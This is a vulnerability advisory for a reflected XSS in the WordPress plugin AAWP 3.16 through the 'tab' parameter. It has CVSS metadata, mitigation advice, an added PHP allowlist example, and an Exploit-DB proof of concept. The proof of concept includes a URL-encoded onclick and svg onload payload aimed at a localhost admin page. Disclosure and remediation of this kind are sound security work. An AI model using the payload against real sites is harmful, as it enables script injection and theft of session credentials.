Vendor: AAWP
Author: Andrea Bocchetti
CVSS: 8.8 (HIGH)
Vulnerability Type: Reflected Cross Site Scripting (XSS)
CWE: 79
Product Name: AAWP
Affected Version From: 3.16
Affected Version To: 3.16
Patch Exists: NO
Related CWE:
CPE: 2.3:a:wordpress:aawp:3.16
Metasploit:
Other Scripts:
Platforms Tested: Windows 10 - Chrome, WordPress 5.8.2
Year: 2022

WordPress Plugin AAWP 3.16 – ‘tab’ Reflected Cross Site Scripting (XSS) (Authenticated)

The vulnerability exists due to insufficient sanitization of user-supplied input in the 'tab' parameter of the 'admin.php' script. A remote authenticated attacker can execute arbitrary HTML and script code in a browser in the context of the vulnerable website. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks.

Mitigation:

Input validation should be used to ensure that untrusted data is not used to update sensitive server-side resources. It is recommended to use a whitelist of accepted inputs that strictly conform to specifications. It is also recommended to disable the 'tab' parameter.
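The allowlist approach described above, as an added example (this is not AAWP's own code, and the plugin's actual tab handling is not shown on this page). It assumes a WordPress plugin context, uses hypothetical tab slugs and function names, and contrasts the unsafe pattern of reflecting the raw query value with a strict allowlist plus output escaping:

```php
<?php
// Added example, not AAWP's code. Illustrates allowlist validation of the
// 'tab' query parameter on a WordPress settings page before it is echoed.
// Tab slugs and function names below are assumed for illustration.

// Unsafe pattern (illustrative only): reflecting the raw query value into
// markup lets a crafted value like "onclick=... break out of the attribute.
//   echo '<a href="admin.php?page=aawp-settings&tab=' . $_GET['tab'] . '">';

function example_aawp_allowed_tabs() {
    // Assumed tab slugs; a real plugin would list its actual settings tabs.
    return array( 'general', 'api', 'display' );
}

function example_aawp_current_tab() {
    $allowed = example_aawp_allowed_tabs();
    $default = $allowed[0];

    if ( ! isset( $_GET['tab'] ) ) {
        return $default;
    }

    // sanitize_key() lowercases and strips everything except [a-z0-9_-],
    // so quotes, angle brackets, slashes and '@' never reach the page.
    $tab = sanitize_key( wp_unslash( $_GET['tab'] ) );

    // Strict allowlist with type-safe comparison: any value not in the known
    // set falls back to the default instead of being reflected.
    if ( ! in_array( $tab, $allowed, true ) ) {
        return $default;
    }
    return $tab;
}

function example_aawp_render_tab_nav() {
    $current = example_aawp_current_tab();

    echo '<h2 class="nav-tab-wrapper">';
    foreach ( example_aawp_allowed_tabs() as $slug ) {
        // Build the link from the allowlisted slug, never from the request.
        $url = add_query_arg(
            array( 'page' => 'aawp-settings', 'tab' => $slug ),
            admin_url( 'admin.php' )
        );
        $class = 'nav-tab' . ( $slug === $current ? ' nav-tab-active' : '' );

        // Escape on output even though $slug is already allowlisted
        // (defence in depth: esc_attr, esc_url and esc_html are WordPress core).
        printf(
            '<a class="%s" href="%s">%s</a>',
            esc_attr( $class ),
            esc_url( $url ),
            esc_html( ucfirst( $slug ) )
        );
    }
    echo '</h2>';
}
```

With this structure the request value is only ever used to select an entry from a fixed list; the markup is always generated from the list itself, so the value in the PoC above is reduced to the default tab rather than being echoed back.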

Exploit-DB raw data:

# Exploit Title: WordPress Plugin AAWP 3.16 - 'tab' Reflected Cross Site Scripting (XSS) (Authenticated)
# Date: 04/01/2022
# Exploit Author: Andrea Bocchetti
# Vendor Homepage: https://getaawp.com/
# Software Link: https://getaawp.com/
# Version: 3.16
# Tested on: Windows 10 - Chrome, WordPress 5.8.2

# Proof of Concept:
# 1- Install and activate AAWP 3.16 plugin.
# 2- Go to https://localhost.com/wp-admin/admin.php?page=aawp-settings&tab=XXXX
# 3- Add payload to the Tab, the XSS Payload: %22onclick%3Dprompt%288%29%3E%3Csvg%2Fonload%3Dprompt%288%29%3E%22%40x.y
# 4- XSS has been triggered.

# Go to this url "http://localhost/wp-admin/admin.php?page=aawp-settings&tab=%22onclick%3Dprompt%288%29%3E%3Csvg%2Fonload%3Dprompt%288%29%3E%22%40x.y"
# XSS will trigger.